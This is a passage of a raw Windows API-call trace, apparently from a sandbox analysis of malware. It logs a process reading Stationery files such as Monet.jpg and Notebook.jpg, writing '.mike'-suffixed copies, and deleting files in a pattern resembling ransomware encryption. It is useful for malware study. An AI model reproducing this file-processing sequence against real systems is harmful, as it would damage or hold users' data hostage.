[0053.633] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.633] ReadFile (in: hFile=0x288, lpBuffer=0x21813b4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21813b4*, lpNumberOfBytesRead=0x2af0c8*=0x8a1, lpOverlapped=0x0) returned 1 [0053.636] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", lpFilePart=0x0) returned 0x48 [0053.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.636] GetFileType (hFile=0x288) returned 0x1 [0053.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.636] GetFileType (hFile=0x288) returned 0x1 [0053.636] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.636] WriteFile (in: hFile=0x288, lpBuffer=0x218765c*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x218765c*, lpNumberOfBytesWritten=0x2af0bc*=0x8b0, lpOverlapped=0x0) returned 1 [0053.637] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", lpFilePart=0x0) returned 0x48 [0053.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0053.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.637] GetFileType (hFile=0x288) returned 0x1 [0053.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0053.637] GetFileType (hFile=0x288) returned 0x1 [0053.638] WriteFile (in: hFile=0x288, lpBuffer=0x218a87c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x218a87c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", lpFilePart=0x0) returned 0x48 [0053.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.638] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe941af20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe941af20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9441080, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xad0)) returned 1 [0053.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", lpFilePart=0x0) returned 0x48 [0053.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.639] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x218bf98 | out: lpFileInformation=0x218bf98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe941af20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe941af20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9441080, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xad0)) returned 1 [0053.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.639] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", dwFileAttributes=0x80) returned 0 [0053.640] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.640] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", lpFilePart=0x0) returned 0x48 [0053.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0053.640] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe941af20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe941af20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9441080, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xad0)) returned 1 [0053.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0053.640] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpFilePart=0x0) returned 0x43 [0053.640] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike", lpFilePart=0x0) returned 0x48 [0053.640] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.mike")) returned 1 [0053.642] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf", lpFilePart=0x0) returned 0x4c [0053.642] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf", lpFilePart=0x0) returned 0x43 [0053.642] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.642] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.642] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0053.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.644] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.645] GetFileType (hFile=0x288) returned 0x1 [0053.645] GetFileType (hFile=0x288) returned 0x1 [0053.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.645] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.645] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.645] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2193024 | out: lpFileInformation=0x2193024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ebf151, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ebf151, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b2f4cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb86)) returned 1 [0053.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.645] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2193340 | out: lpFileInformation=0x2193340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ebf151, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ebf151, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b2f4cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb86)) returned 1 [0053.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", lpFilePart=0x0) returned 0x4b [0053.645] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", lpFilePart=0x0) returned 0x4b [0053.646] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", lpFilePart=0x0) returned 0x4b [0053.646] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.646] GetFileType (hFile=0x288) returned 0x1 [0053.646] GetFileType (hFile=0x288) returned 0x1 [0053.646] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.647] WriteFile (in: hFile=0x288, lpBuffer=0x21941a4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21941a4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.648] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2193cac | out: lpFileInformation=0x2193cac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ebf151, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ebf151, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b2f4cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb86)) returned 1 [0053.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.648] GetFileType (hFile=0x288) returned 0x1 [0053.648] GetFileType (hFile=0x288) returned 0x1 [0053.648] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.648] ReadFile (in: hFile=0x288, lpBuffer=0x21952d0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21952d0*, lpNumberOfBytesRead=0x2af0c8*=0xb86, lpOverlapped=0x0) returned 1 [0053.650] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", lpFilePart=0x0) returned 0x4b [0053.650] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.650] GetFileType (hFile=0x288) returned 0x1 [0053.650] GetFileType (hFile=0x288) returned 0x1 [0053.650] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.650] WriteFile (in: hFile=0x288, lpBuffer=0x219c6c0*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x219c6c0*, lpNumberOfBytesWritten=0x2af0bc*=0xb90, lpOverlapped=0x0) returned 1 [0053.650] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", lpFilePart=0x0) returned 0x4b [0053.651] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.651] GetFileType (hFile=0x288) returned 0x1 [0053.651] GetFileType (hFile=0x288) returned 0x1 [0053.652] WriteFile (in: hFile=0x288, lpBuffer=0x219f8e8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x219f8e8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpFilePart=0x0) returned 0x46 [0053.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike", lpFilePart=0x0) returned 0x4b [0053.652] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9441080, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9441080, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe94671e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xdb0)) returned 1 [0053.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", dwFileAttributes=0x80) returned 0 [0053.654] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.mike")) returned 1 [0053.655] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.657] GetFileType (hFile=0x288) returned 0x1 [0053.657] GetFileType (hFile=0x288) returned 0x1 [0053.657] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.657] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.657] GetFileType (hFile=0x288) returned 0x1 [0053.657] GetFileType (hFile=0x288) returned 0x1 [0053.658] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.658] WriteFile (in: hFile=0x288, lpBuffer=0x21a4f50*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21a4f50*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.659] GetFileType (hFile=0x288) returned 0x1 [0053.659] GetFileType (hFile=0x288) returned 0x1 [0053.659] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.659] ReadFile (in: hFile=0x288, lpBuffer=0x21a6094, 